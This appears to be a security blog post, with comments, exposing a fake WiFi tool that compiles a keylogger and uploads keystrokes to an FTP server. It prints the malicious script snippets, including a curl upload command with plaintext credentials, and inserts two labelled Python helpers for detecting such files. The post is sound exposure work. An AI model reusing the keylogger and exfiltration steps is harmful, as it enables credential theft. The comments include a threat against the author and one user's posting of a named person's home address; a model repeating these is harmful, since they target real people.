How [not to] scam security people

I have been playing around with some wireless security for one of my customers lately. Having a pretty solid understanding of how things work, but also having been challenged to try out “everything there is to try” by the client, I went off to look for new tools that I might not have tried before.

It did not take too long, and with the accidental help of TechCrunch (btw TechCrunch – you may want to change this link to something else after you read this…) I ran into this “Wifi Security” site.

Yes, I know, the design is horrible, the scrolling thing on the top of the page is just missing a <blink> tag to drive you into an epileptic seizure, and the music, well, it’s music as part of a website – welcome to the 80’s.

Not being deterred by the horrible design, I went ahead and downloaded the “tools” offered in the article. After all, the FBI are using this guy’s tools…
A quick look, and I was faced with three supposed shell scripts (ended with a .sh), and a tarball called “rogue.tar.gz”.
When you get a shellscript that isn’t a shellscript, and is being reported as an “ELF” executable, you should get your detective hat on, which is exactly what I did.
It didn’t take long, and the scam unfolded pretty quickly. Here’s a quick recap of what’s going on with this guy’s website:

  1. The provided “tools” aren’t even security tools. Initially I figured – ok, so this guy packed a few open source wireless tools and scripted them for easy usage. No. Not even karma, which the main script’s name suggests is being used (appropriately, I might add, for what this script is SUPPOSED to do).
  2. A quick look at the tarball revealed that it actually contains a keylogger that has been graciously stolen from here.
  3. When the main script (karma.sh) is run, two supporting scripts (bg1.sh and bg2.sh) are launched. They take care of compiling the keylogger, running it, and pushing the keystroke logfile to an FTP server for the attacker (I guess we can call him that now) to use at his convenience.
  4. You are prompted to log into your webmail account, send a request for a free activation code with an indemnity text, which would be answered by the “automatic” processes on their end promptly so you can enter the code into the installer and start playing around with WiFi security. FTW!

Observant readers may notice that I referred to the tool as having “supposed” script files that are actually binaries, and now I refer to them as scripts again. What gives?
Well, simply put, our attacker didn’t really take the time to code an application; he just wrote a couple of shell scripts, and to hide his malicious intent he “compiled” them with shc, a utility that packs shell scripts into executable form. The road from that Linux executable back to the original script is pretty short…

Now that most of the cards are on the table, we can actually take a look at what scam this guy is running, and how he runs it. Following are some snippets from the shellscript that was presumably a wireless security tool. Even if you are not an avid Linux shellscripter, I’m sure that the annotations (true to the original) will shed some light…

# START BACKGROUND PROGRAMS BG1(RUN LINUX KEYLOGGER) AND BG2(RUN MONITORING KEYSTROKES AND SEND LOG.TXT FILES TO DRIVEHQ)
cd lkl2
./configure --silent
make --silent
make install --silent
cd
chmod +x /root/bg1.sh
nohup /root/bg1.sh &
rm -r /root/nohup.out
chmod +x /root/bg2.sh
nohup /root/bg2.sh &
sleep 2
rm -r /root/nohup.out
clear

So, we see how the keylogger is compiled, installed and the supporting scripts bg1 and bg2 are run.
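As an added example (it is not from the post or from the scammer’s files), here is a small Python triage helper that does the two checks this walk-through relies on: telling an ELF binary from a genuine script by its first bytes, whatever extension it was handed out with, and flagging the behaviours seen in the recovered script (compiling bundled code, detaching background jobs and deleting their output, launching a browser at a login page, and the curl upload with hardcoded credentials that is decoded further down the post). The ELF header bytes and the script text are constructed to mirror the quoted snippets; the FTP host and the USER:PASSWORD credential are placeholders.

```python
import re

ELF_MAGIC = b"\x7fELF"

# Constructed stand-in for the first bytes of one of the downloaded ".sh" files
# that `file` reports as an ELF executable (header bytes only, not a real binary).
SAMPLE_ELF = b"\x7fELF\x02\x01\x01\x00" + b"\x00" * 8

# Constructed script modelled on the snippets quoted in the post; the FTP host
# and the USER:PASSWORD credential are placeholders, not the real ones.
SAMPLE_SCRIPT = """#!/bin/sh
# START BACKGROUND PROGRAMS BG1 AND BG2
cd lkl2
./configure --silent
make --silent
make install --silent
cd
chmod +x /root/bg1.sh
nohup /root/bg1.sh &
rm -r /root/nohup.out
firefox https://login.yahoo.com/ &
curl -s -k --ftp-ssl -T /pentest/log.txt -u USER:PASSWORD ftp://ftp.example.invalid/code1.txt
"""

# Behaviours worth flagging in a "security tool" that arrives as a script.
# Each pattern matches one whole line; a capture group, when present, is the
# piece of evidence to report.
INDICATORS = [
    ("compiles-and-installs-bundled-code", re.compile(r"^\s*make\s+install\b.*$", re.M)),
    ("detached-background-job", re.compile(r"^\s*nohup\s+.*&\s*$", re.M)),
    ("removes-its-own-output", re.compile(r"^\s*rm\s+-\w+\s+\S*nohup\.out.*$", re.M)),
    ("uploads-local-file", re.compile(r"^.*\bcurl\b.*\s-T\s+(\S+).*$", re.M)),
    ("embedded-credentials", re.compile(r"^.*\bcurl\b.*\s-u\s+(\S+).*$", re.M)),
    ("launches-browser-at-login-page",
     re.compile(r"^\s*firefox\s+(https?://\S*(?:login|accounts)\S*).*$", re.M | re.I)),
]


def classify_download(blob: bytes) -> str:
    """Tell an ELF binary from a real script by its first bytes, regardless of
    the file extension it was handed out with."""
    if blob.startswith(ELF_MAGIC):
        return "elf-binary"
    if blob.startswith(b"#!"):
        return "script"
    return "unknown"


def scan_script(text: str):
    """Return (indicator, evidence) pairs in the order the indicators are defined.
    Credentials are reported as user:<redacted> so the report itself does not
    leak them."""
    findings = []
    for name, pattern in INDICATORS:
        for m in pattern.finditer(text):
            evidence = m.group(1) if m.lastindex else m.group(0).strip()
            if name == "embedded-credentials":
                evidence = evidence.split(":", 1)[0] + ":<redacted>"
            findings.append((name, evidence))
    return findings


def verdict(findings) -> str:
    """Summarise the findings: an upload with hardcoded credentials is treated
    as exfiltration; unsolicited builds or detached jobs as suspicious."""
    names = {name for name, _ in findings}
    if {"uploads-local-file", "embedded-credentials"} <= names:
        return "exfiltration: a local file is pushed to a remote server with hardcoded credentials"
    if names & {"detached-background-job", "compiles-and-installs-bundled-code"}:
        return "suspicious: builds or detaches code the user did not ask for"
    return "no indicators"


if __name__ == "__main__":
    print(classify_download(SAMPLE_ELF), "vs", classify_download(SAMPLE_SCRIPT.encode()))
    results = scan_script(SAMPLE_SCRIPT)
    for name, evidence in results:
        print(f"{name:36} {evidence}")
    print(verdict(results))
```

Run as a script it prints the classification of both samples, the indicator list and the verdict; in practice you point classify_download at the raw download and scan_script at whatever script text you manage to recover from it.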
Next up, is the installer itself (if one can call that) which prompts for the user to send a FREE activation request to the attacker:

# MENU LIST
echo ""
echo "--------------------------------------------------------- "
echo "THIS MESSAGES WILL NOT APPEAR AFTER karma.sh IS ACTIVATED "
echo "--------------------------------------------------------- "
echo ""
echo "1. Compose indemnity text below and send to [email protected]"
echo " Yes, I want activation code and will never use for illegal purpose"
echo ""
echo "2. Check your email for activation code after sending text "
echo ""
read -p "3. Send now ? (0=no, 1=yes) " act
clear

Obviously, the message WILL appear, as this thing is NEVER going to be activated – remember – this is a shellscript, and the “menu” appears as-is unconditionally so you can try to activate this until blue in the face… but we are getting ahead of ourselves.

I mentioned in the title that the scam is targeting security people. Besides the obvious wireless security related topic, here’s another little piece of “evidence” from the script:

read -p "Which backtrack are you using ? (bt3=3,bt4=4) " bt

Our little friend is assuming that we are using BackTrack (as most security folks do) to run their wireless tests… the script continues according to which version of BT is entered (to accommodate the differences in network configuration…).
I’ll skip through the network connectivity checks (trust me), and next up the attacker makes sure that firefox isn’t running, and:

firefox https://login.yahoo.com/ &
sleep 4
firefox https://www.google.com/accounts/ManageAccount &
sleep 4
firefox http://home.live.com/

The attacker obviously wants us to log into one of our webmail accounts so we can send him that activation request email with the indemnity text (how considerate). Keeping in mind that the keylogger is on and its activity is uploaded in the background to the attacker’s FTP – this is exactly where most people will fall into the trap.

And for the grand finale – the actual activation (you’d think huh?):

############################
# DECOY FOR ACTIVATION CODE
clear
echo ""
read -p "ENTER ROGUE AP ACTIVATION CODE : " pls
sleep 3
echo "You have entered an invalid code "
echo ""
exit
############################

You have to admit that commented code is the best! It’s actually saying “decoy”! How f*&^ing awesome is that? You get to craft your email after logging into your Yahoo!/Gmail/Live account, and then go back to this completely useless activation part. I do like the fact that the author put a “sleep 3” before letting you know that you entered the wrong code. As if it was hard at work verifying it. Classic.

That’s about it for the technical analysis, but it wouldn’t be complete without the actual interaction with the attacker, would it? Let’s see – so, we crafted a “request for free activation” email with the indemnity text in it, and guess what – we got a reply!

Hi

1. We are preparing the activation code for you.

2. To make worth our while, could you consider a small donation (suggest euro 11) to support the website via Paypal a/c [email protected] ?

Cheers.

EMAIL VIA MY CELLPHONE FOR FAST RESPONSE
http://fadzilmahfodh.blogspot.com

So not only is there no activation code to be “prepared” for me (what? I’m going to feed it to the “decoy” and it’ll magically work?), we are being prompted to donate some cash to the poor bastard who worked so hard to make this tool for the community…
I cordially answered that:

1. Thanks. I’ll be looking forward to the activation code.

2. I’ll probably consider it after being able to test out the tool.

Which was answered with a suggestion to try the trial version on his site (which relates to a completely different tool, but let’s not be too picky about it…).
Now, thankfully, I was using one of my throw-away Yahoo accounts, and apparently so was our attacker. If you haven’t noticed, one of the cool things in the new Yahoo! webmail is that you get an indication whether the person emailing you is online or not, and you can chat with them!
Guess what happens next…

----- Our chat on Wed, 7/7/10 2:53 PM -----
Iftach(2:34 PM):  hey man
Iftach(2:34 PM):  mind if a ask a couple of questions?
fadzilmahfodh(2:34 PM):  okey
Iftach(2:35 PM):  cool. I’m doing this research on security tools and their
authors…
fadzilmahfodh(2:35 PM):  okey
Iftach(2:35 PM):  saw your tool and wanted to hear about how you got to write
it, how well is it distributed in the community etc…
Iftach(2:36 PM):  does that activation thing a common practice with free tools?
fadzilmahfodh(2:36 PM):  yes see, we need to maintain our website thus we need
supporter
fadzilmahfodh(2:37 PM):  everyday there are at least 500++ people asking for
code
Iftach(2:37 PM):  I see.
fadzilmahfodh(2:37 PM):  i no longer able to provide for free
fadzilmahfodh(2:37 PM):  too time consuming and i need to be compensated for my
time and effort
fadzilmahfodh(2:38 PM):  hope you understand

Time and effort? Right… For a scam script that doesn’t even have any networking functionality… Ok, I’ll go along…

Iftach(2:40 PM):  now, about the tool – that’s a linux binary obviously (thought
it was a shell script at the beginning). Did you base it on something existing
or write yourself?
fadzilmahfodh(2:41 PM):  i wrote it by my self then scramble the code
Iftach(2:41 PM):  hence the activation i see…
fadzilmahfodh(2:42 PM):  i can afford to give ‘free lunch’ to everybody. Hope
you understand
Iftach(2:43 PM):  sure, i understand.
fadzilmahfodh(2:43 PM):  So you interested in the software?
Iftach(2:44 PM):  more from a research point of view – for an article I’m
writing
Iftach(2:44 PM):  so, the installer you use, I see that it contains some
additional code that is being compiled on the client.
fadzilmahfodh(2:45 PM):  Yes. The purpose is the code will be unique to user
hardware
Iftach(2:45 PM):  and I saw that there were some FTP connections made? Is that
to verify that the client is a registered one?
fadzilmahfodh(2:46 PM):  Well, that is another story…
Iftach(2:46 PM):  I’m listening
fadzilmahfodh(2:46 PM):  maybe some other time huh
Iftach(2:47 PM):  OK. Last question – do you get a lot of account passwords
through that keylogger that sends the data to your FTP?
fadzilmahfodh(2:47 PM):  sorry, no comment unless i am in court

At this point of my “interview” with him, I guess that my cover was going to get pretty real, hence this “article” that you are reading… You can’t make this stuff up so I figured I’ll blog it…

Iftach(2:48 PM):  aha, and it’s part of the installer because? just to make sure
people can send the activation email correctly?
Iftach(2:48 PM):  Back to statistics, out of the average 500 ppl asking for
activation – how many passwords do you manage to grab?
fadzilmahfodh(2:49 PM):  well, the ftp is to confirm that software match with
data in server
fadzilmahfodh(2:49 PM):  if it does not match, it will fail to run
fadzilmahfodh(2:49 PM):  or i can just change the data/activation code in the
server
fadzilmahfodh(2:49 PM):  then everything will not run
Iftach(2:49 PM):  and how does that relate to the keylogging?
fadzilmahfodh(2:50 PM):  well, that i another story…
Iftach(2:51 PM):  I mean – the keylogger data is sent to that FTP. Is that part
of the verification or is this a separate process?
Iftach(2:51 PM):  So, on average, how many accounts you manage to get on that
FTP server per day?
fadzilmahfodh(2:51 PM):  well, you do not even support my website and how the
hell am i going to tell you
Iftach(2:52 PM):  Let’s just get it straight – I’m not going to “support” the
site… I’m just doing some research on security tools.
fadzilmahfodh(2:52 PM):  bye
Iftach(2:53 PM):  You are free to tell, or not if you don’t want to. But I’m
publishing the story as it is…
Iftach(2:53 PM):  With your acknowledgment that you use a keylogger to steal your
site visitor passwords. Unless you want to be quoted otherwise in the story…

True to my chat with Fadzil (or whatever his name is), I’m telling it the way it is.

But wait, there’s more!!! more? how come? well, just to put some icing on this, I went back and decoded the script that was in charge of the FTP upload…

curl -s -k --ftp-ssl -T /pentest/log.txt -u fadzilmahfodh:buaya ftp://ftp.drivehq.com/code$number.txt

Just to see the final lameness come to life as I tested the account:

[Screenshot: the FTP login to that DriveHQ account fails]

And you know what – it’s all our fault! If we as a community would have “donated” to this guy for all his hard work and effort that he’s been putting in creating tools that are used by the FBI (check out his site…), he would have had the money to keep his driveHQ account in order and could make a decent living out of ripping people off.

Seriously.

p.s. you can find me talking about this entertaining event on the ISDPodcast with my buddy Rick. I just had to vent before putting this in writing, so hopefully this account is a bit more thorough and to your liking…

Update 7/13/2010: I could not have wished for better response from the community on this post, but having the actual culprit respond here is priceless. As you can probably see, Fadzil has posted a comment, and to sum things up let me just state that I’m not that surprised by its content (I think it’s called “pulling a ligatt” these days…). On one hand he offhandedly dismisses that there was ever such an issue with a keylogger, on the other hand he promises a better version with (and I’m quoting): “rogue ap + fake login page + keylogger + ftp = to get WPA or WPA2 password”.

You don’t say?! I’m still waiting for the security practitioner who will explain to me why anyone would need a keylogger + ftp to use a rogue AP with fake login pages. I’m really hoping that this post helps the community learn more about criminals such as the one we are dealing with here. Don’t be tempted by “smooth-talk” that tries to look technical and hackerish while having nothing behind it. And if you have had any additional experiences with this guy, feel free to add them to the comments or email me so I’ll update this story for everyone’s benefit.

27 thoughts on “How [not to] scam security people”

  1. Hi Iftach,

    –The road from a linux executable to realizing what the script originally was is pretty short…–

    Can u plz explain how u decompiled those scripts which were compiled with shc?…Thanks

  2. Pingback: Anonymous
  3. @akks – of course. There are two ways:
    The hard way – pop the ELF file in IDA/Olly/dbg and trace its execution. You’ll notice that at some point there is a call to shell.c. Taking a look at the memory at that point will show you the whole script.
    The easy way (and I’m all for these kinds of shortcuts) is to monitor the processes (a simple ps axwww would do) – again, you’ll notice how the executable is being called with a parameter (-c) and a more scrutinized look will also show you the entire script (which is passed as a parameter to the shell interpreter – just scroll up/down through the ps axwww listing and you’ll see what I mean). Easy peasy.
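To make the “easy way” above concrete, here is an added Python example (not code from the post, its comments or the scammer’s files) that parses a `ps axwww`-style listing, folds a command line that spills over several lines back into one record, and pulls out the script text that a shell was handed through `-c`. The listing, the PIDs and the script lines are constructed for this example and only mimic the situation the reply describes.

```python
import re

# Constructed `ps axwww` listing modelled on the situation described above:
# a packed "karma.sh" has handed its script text to a child shell via `-c`,
# so the whole script shows up in the process table. PIDs, TTYs and the
# script lines are constructed for this example.
SAMPLE_PS = """\
  PID TTY      STAT   TIME COMMAND
 1201 pts/0    Ss     0:00 -bash
 1340 pts/0    S+     0:00 ./karma.sh
 1341 pts/0    S+     0:00 /bin/sh -c # START BACKGROUND PROGRAMS BG1 AND BG2
cd lkl2
./configure --silent
make --silent
make install --silent
chmod +x /root/bg1.sh
nohup /root/bg1.sh &
 1355 pts/0    S      0:00 /bin/sh /root/bg1.sh
 1360 ?        Ss     0:00 /usr/sbin/sshd
"""

# A record begins with the PID, TTY, STAT and TIME columns; any line that does
# not is a continuation of the previous record's command line.
RECORD = re.compile(r"^\s*(\d+)\s+\S+\s+\S+\s+[\d:.]+\s+(.*)$")

# A shell started with an inline program: optional path, sh/bash/dash, then -c.
INLINE_SHELL = re.compile(r"^(?:\S*/)?(?:ba|da)?sh\s+-c\s+(.*)$", re.S)


def parse_ps(output: str):
    """Split ps text into (pid, command) pairs, folding spilled-over lines back
    into the record they belong to."""
    records = []
    for line in output.splitlines():
        if line.strip().startswith("PID"):
            continue  # column header
        m = RECORD.match(line)
        if m:
            records.append([int(m.group(1)), m.group(2)])
        elif records:
            records[-1][1] += "\n" + line
    return [(pid, cmd) for pid, cmd in records]


def recover_inline_scripts(records):
    """Return {pid: script_text} for each shell whose `-c` argument is a full
    script (more than one line or command) rather than a one-liner."""
    found = {}
    for pid, cmd in records:
        m = INLINE_SHELL.match(cmd)
        if not m:
            continue
        body = m.group(1)
        if "\n" in body or ";" in body:
            found[pid] = body
    return found


if __name__ == "__main__":
    for pid, script in recover_inline_scripts(parse_ps(SAMPLE_PS)).items():
        print(f"--- script recovered from pid {pid} ---")
        print(script)
```

On a live system you would feed the output of `ps axwww` to parse_ps instead of the constructed sample; the folding step is what keeps a script with many lines from being mistaken for a dozen unrelated processes.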

  4. Jesus… Luckily I found this before I hadn’t, hopefully, made a very big mistake. I did download and run the files from his site unfortunately yesterday… which means that I did send that stupid email and he probably did get my account password. But, I did change it today, so I hope I’m safe.
    Since he changed his password I don’t know if his account was working yesterday and if he got my password. Could you please help??

    1. Dragos, I can tell you that as of 7/8 (couple of days ago) his ftp account was not working due to missing payments. This means that unless he ponied up some cash you should be ok as your credentials (and whatever else that was keylogged) didn’t go anywhere.
      Nevertheless – I would change passwords on the webmail and the local os you are using (as you might have already done).

  5. my conversation with him afterwards:

    webmaster
    I am online. We can chat now!

    alex
    hi, remember me?

    webmaster
    hi

    alex
    well. I would like to thank you for the scam… I learned a lesson today in not trusting people.
    just curious: did you get my email account credentials or not?

    webmaster
    why you said that tam?

    alex
    is your ftp account running or not?
    tam???
    sorry, don’t understand

    webmaster
    nevermind, what you want from me now?

    alex
    just to know if you’re gonna be trouble or not…

    webmaster
    i will try to help where ever i can

    alex
    meaning: do you have my email account credentials or not

    webmaster
    too many , i don’t bother to keep everything
    i got about 500+ per day, easy

  6. Jeez Dragos, the guy is completely clueless.
    He thinks you are asking how many hits he gets per day, I don’t think he realizes that he was so blatantly ousted and shamed (seriously – he can’t afford to maintain an FTP account).
    I think you are pretty safe for now – thank goodness that sometimes these guys aren’t the sharpest pencils in the drawer 🙂
    Thanks for the update and the chat log – I’m sure that other readers find this as funny as I have!

  7. Thank you for your interest in our website http://fadzilmahfodh.blogspot.com

    We would like to add a few new information to your post

    1. Since you highlighted this ‘issue’ of keylogger, the number of visitors to our website has doubled. I guess forbidden ‘fruits’ are more attractive. Thank you for your promotional effort.

    2. The hack using activation code is obsolete and we now have upgraded to a new hacking engine using backtrack4 final which is more lethal.

    3. The script might be ‘lame’ to some of you, but most user find it very useful as not all user are an expert in the field. If you find the script ‘lame’ perhaps it is not meant for you guys.

    4. The new WPA HACK without using dictionary will use: rogue ap + fake login page + keylogger + ftp = to get WPA or WPA2 password.

    5. The drivehq account is freely available and one can generate new account without much hassle. The fadzilmahfodh/buaya account is purposely ignored. It is an expired account and poses no harm to user.

    6. I hope the webmaster can post my comment so we put the matter in right prospective.

    Thank you.

  8. For those who asked about the comment from Mohd Fadzil Mahfodh above – yeah, looks pretty legit.

    It includes pre-browsing in Google while searching for his own name (vanity), not using a proxy to hide his location (Malaysia – hence the name), full logging of his IP as well as some poking around at the site to look for information on me.

    I truly welcome the honest comment, and the blunt attempt to appear as legitimate website, but I leave it to my readers to judge for themselves who we are dealing with here 🙂

  9. Hi there,

    1. The karma software is obsolete and no longer supported as it has already been replaced by latest software using bt4 for quite sometime now.

    2. My paypal account is a verified account and linked to my bank here which has my full ID, work and home address. The authorities will be all over me by now if i do illegal activities with the software. I can be easily traced by them. Well, why do i want to do that (illegal activities)?

    3. What your articles said gives some recognition to my skill but a thief, i am certainly not.

    4. However, i am willing to share my technical knowledge to who ever is interested to learn hacking.

    Cheers

  10. @Fadzil – thanks for leaving another comment.

    I’ll bite and actually address the points you have brought up here, although I do believe that you are a criminal and am hopeful that the law enforcement in Malaysia will take care of you (although from my experience I doubt it very much).

    1. ok, so why call your tool “karma” in the first place? another bait? (this one did not have comments in your code so I’m guessing… 🙂 )

    2. Great – we also now have 2 different IP addresses from which you posted your comments un-proxied from Malaysia. Hopefully (but again – I doubt it as I stated before) they will be used appropriately.

    3. Well, not entirely correct. I reckon that your only skills are as a thief. I haven’t really seen any other talent after reviewing the so-called software you proclaim to provide on your site (or for that matter your site, it’s design, your writing skills, or any other technical/software capacity you may claim to have).

    4. Yeah… I’m sure that’s not going to happen. Sorry.

    Hope this puts things in perspective, and I’m pretty certain that the uptick that your blog has experienced has been from people laughing at you (and not with you as you may think…)

    1. That’s just epic!

      Really – could you have expected anything else from a juvenile skiddie that can’t even spell?

      I figure that this just proves my point even further along. Can’t trust him. At least one good thing came out of this – the new design sucks less!!!

      Have a great one 🙂

  11. Hi Iamit,

    I saw your face and cv in some of the adult website.

    Is it really you in the photo?

    I hope your wife, kids, parents, neighbors, community will not see you ‘perform’ in their email.

    Adious

  12. Can someone give me activation code for karma.sh!!!!!!!!!!!!!If someone know activation code the plz send it 2 my mail adrs………:)

    1. Jamil,

      Hopefully you have read this post, if not let me sum it up quickly: there is NO activation key for “karma.sh” as provided from the scammer website. You can get a copy of karma from the original author’s site here: http://theta44.org/karma/index.html

      Keep away from the “karma.sh” that you downloaded (the one with the activation key) as it is actually spying on your machine and won’t provide you with any functionality whatsoever…

  13. Iamit,

    I fell victim to this fool recently. I changed most of my passwords. I am wondering though, does the script/program stay running even after reboot? If so, what do I need to do to get it off my computer??

    Thanks for the help!
    Chris

    1. The application does not stay resident on the pc after reboot. The simplest way to get rid of it is to just delete any files associated with it (plus the ones that have been created by it).

      As I mentioned in a later post, we have managed to bring down all the malicious content that has been served by this guy, and the current content is a simple bunch of shell scripts that do not show any malicious content.

  14. Here are his WU DETAILS….. he’s such a retarded brat. I’ll send him the link once the message is up ).

    NEW
    http://chikiabu.blogspot.com/
    [email protected]

    You can donate using cash or credit card to support the website as follows:-

    WESTERN UNION
    ————————-
    First Name : Mohd Fadzil
    Last Name : Mahfodh
    Address : No 2, Jalan 11/2N Najat, Section 11, Shah Alam
    Zip code : 40100
    State : Selangor
    Country : Malaysia

    Amount: euro 11.00

    Package: fish and fakeap hack
